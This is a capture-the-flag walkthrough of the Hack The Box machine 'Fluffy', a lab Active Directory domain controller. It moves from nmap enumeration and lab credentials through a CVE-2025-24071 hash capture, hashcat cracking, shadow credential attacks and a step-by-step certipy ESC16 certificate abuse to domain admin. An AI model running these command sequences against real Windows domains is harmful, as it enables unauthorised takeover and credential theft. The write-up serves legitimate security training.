Setup
mkdir -p ~/ctf/HackTheBox/fluffy/scans; cd ~/ctf/HackTheBox/fluffy
IP Address: 10.10.11.69
echo "10.10.11.69 fluffy.htb" | sudo tee -a /etc/hosts
10.10.11.69 fluffy.htb
Enumeration
nmap -sC -sV -Pn -p- fluffy.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 fluffy.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-06-01 19:20:02Z)
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T19:21:32+00:00; +6h38m39s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-06-01T19:21:33+00:00; +6h38m39s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T19:21:32+00:00; +6h38m39s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T19:21:33+00:00; +6h38m39s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA/domainComponent=fluffy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
| SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49685/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc syn-ack Microsoft Windows RPC
49688/tcp open msrpc syn-ack Microsoft Windows RPC
49703/tcp open msrpc syn-ack Microsoft Windows RPC
49717/tcp open msrpc syn-ack Microsoft Windows RPC
49749/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
As this is a assumed breach challenge, we have the credentials: j.fleischman:J0elTHEM4n1990!
Initial enumeration using netexec shows the users list and shares:
Here we see a share ‘IT’ where we have READ and write permissions.
Using smbclient.py fluffy.htb/'j.fleischman':'J0elTHEM4n1990!'@10.10.11.69
We see the following files:
in Upgrade_Notice.pdf:
using rusthound -d fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' -o 'bloodhound' -z -i 10.10.11.69 --adcs we collect data for bloodhound and see that our user is a member of CERTIFICATE SERVICE DCOM ACCESS group.
using the exploit for CVE-2025-24071:
We get the NTLMv2 hash for p.agila
p.agila::FLUFFY:17292a964fdb3998:BBFD39********************************************************
Using hashcat we crack this NTLM hash
hashcat -m 5600 p_agila.hash /usr/share/wordlists/rockyou.txt
p.agila:pr**********************
p.agila has GenericAll rights on Service Accounts group which contains winrm_svc,ldap_svc,ca_svc
which as the name suggests have the SPN set to access their services.
Using GetUserSPNs.py -request -dc-ip 10.10.11.69 'fluffy.htb'/'p.agila':'pro***************'
We get the krb5tgs hashes, we try cracking them using hashcat but returns no passwords.
using pywhiskers we perform Shadow credential attack
python3 pywhisker/pywhisker.py -d 'fluffy.htb' -u "p.agila" -p 'pro***************' --target 'winrm_svc' --action "add" --filename winrm_svc
python3 gettgtpkinit.py -cert-pfx ~/AD_Scripts/pywhisker/winrm_svc.pfx -pfx-pass '2STlYKkYncUlHZk1IQjH' fluffy.htb/winrm_svc winrm.ccache
python3 getnthash.py -key 665a7b********************** fluffy.htb/winrm_svc
We get the hash winrm_svc:33bd0******************************
All of the above setups can be automated and we can obtain the hash using certipy using:
certipy shadow auto -u 'p.agila@fluffy.htb' -p 'pro***************' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
User Flag
Location: C:\Users\winrm_svc\Desktop\user.txt | Flag: 4c7*************************
Privilege Escalation
Using the shadow credential attack in a similar manner we extract the hash for ca_svc user
ca_svc:ca0f4f**********************
using certipy using the ca_svc we see, it is vulnerable to ESC16
Using the guide ESC16:
Step 1: Read initial UPN of the ca_svc account
certipy account -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -user 'ca_svc' readStep 2: Update the ca_svc account’s UPN to the administrator’s sAMAccountName.
certipy account -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' updateStep 3: Obtain credentials for the “ca_svc” account (via Shadow Credentials).
certipy shadow -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -account 'ca_svc' autoexport KRB5CCNAME=ca_svc.ccacheStep 4: Request a certificate as the “ca_svc” user from any suitable client authentication template (e.g., “User”) on the ESC16-vulnerable CA. Because the CA is vulnerable to ESC16, it will automatically omit the SID security extension from the issued certificate, regardless of the template’s specific settings for this extension.
certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'Step 5: Revert the “ca_svc” account’s UPN.
certipy account -u 'p.agila@fluffy.htb' -p 'pro***************' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' updateStep 6: Authenticate as the target administrator.
certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
using the obtained hash we login using winrm and obtain admin shell access
Root Flag
Location: C:\Users\Administrator\Desktop\root.txt | Flag: 3a58***********************